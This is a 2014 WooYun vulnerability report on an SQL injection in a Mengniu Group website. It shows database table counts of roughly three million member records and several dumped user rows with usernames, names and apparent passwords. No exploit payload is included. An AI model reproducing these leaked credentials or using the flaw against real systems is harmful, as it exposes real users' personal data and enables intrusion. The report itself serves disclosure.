漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-082173
漏洞标题:蒙牛集团高危SQL注射(约300W用户信息告急)
相关厂商:蒙牛集团
漏洞作者: 黑暗游侠
提交时间:2014-11-06 10:33
修复时间:2014-12-21 10:34
公开时间:2014-12-21 10:34
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
蒙牛集团高危SQL注射 # 大量用户告急
详细说明:
蒙牛集团高危SQL注射 # 大量用户告急
300W
漏洞证明:
Database: zgltest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| zgl_member | 2993006 |
| zgl_member_usermeta | 2987775 |
| zgl_card_record | 2405573 |
| zgl_myhd | 33573 |
| zgl_delivery_address | 20109 |
| zgl_gift_record | 20102 |
| zgl_message_data | 10756 |
| zgl_person_test | 9041 |
| zgl_game_share | 6457 |
| zgl_friend | 4776 |
| zgl_linkage | 3284 |
| zgl_game_score | 2584 |
| zgl_message | 540 |
| zgl_menu | 276 |
| zgl_attachment | 209 |
| zgl_model_field | 146 |
| zgl_clearlog | 130 |
| zgl_attachment_index | 109 |
| zgl_hits | 33 |
| zgl_search | 33 |
| zgl_message_group | 32 |
| zgl_cache | 31 |
| zgl_sso_messagequeue | 19 |
| zgl_category | 16 |
| zgl_module | 16 |
| zgl_news | 15 |
| zgl_news_data | 15 |
| zgl_type | 13 |
| zgl_category_priv | 10 |
| zgl_pay_account | 10 |
| zgl_download | 8 |
| zgl_download_data | 8 |
| zgl_member_detail | 8 |
| zgl_urlrule | 8 |
| zgl_member_group | 7 |
| zgl_model | 7 |
| zgl_admin_role | 6 |
| zgl_duihuan_jifen | 6 |
| zgl_duihuan_jifen_data | 6 |
| zgl_content_check | 5 |
| zgl_public_rzhi | 5 |
| zgl_public_rzhi_data | 5 |
| zgl_special | 5 |
| zgl_sso_settings | 5 |
| zgl_sso_members | 4 |
| zgl_workflow | 4 |
| zgl_member_menu | 3 |
| zgl_sso_session | 3 |
| zgl_page | 2 |
| zgl_plugin_var | 2 |
| zgl_position_data | 2 |
| zgl_admin | 1 |
| zgl_plugin | 1 |
| zgl_position | 1 |
| zgl_site | 1 |
| zgl_sso_admin | 1 |
| zgl_sso_applications | 1 |
+---------------------------------------+---------+
<blank> | 0 | 1330272000 | irishan | <blank> | 你我十八岁 | 10 | 3 | 2014-03-03 15:04:12 | <blank> | 0 | 10 |
| 0 | 48 | 1 | 0 | 2 | <blank> | 3563625 | 0 | 0 | <blank> | [email protected] | 0 | <blank> | <blank> | 0.00 | 0 | 0 | <blank> | 0 | 1330272000 | liutianquan | <blank> | shaojun1986 | 2 | 3 | 2014-03-03 15:04:12 | <blank> | 0 | 2 |
| 0 | 49 | 1 | 0 | 2 | <blank> | 3563701 | 0 | 0 | <blank> | <blank> | 0 | <blank> | <blank> | 0.00 | 1330272000 | 0 | <blank> | 0 | 1330272000 | 吴玉寿 | <blank> | shen123 | 30 | 2 | 2014-03-03 15:04:12 | <blank> | 0 | 10 |
| 0 | 50 | 1 | 0 | 2 | <blank> | 3563702 | 0 | 0 | <blank> | [email protected] | 0 | <blank> | <blank> | 0.00 | 1330272000 | 0 | <blank> | 0 | 1330272000 | 878703004 | <blank> | wuancheng | 10 | 3 | 2014-03-03 15:04:12 | <blank> | 0 | 10 |
修复方案:
过滤
版权声明:转载请注明来源 黑暗游侠@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)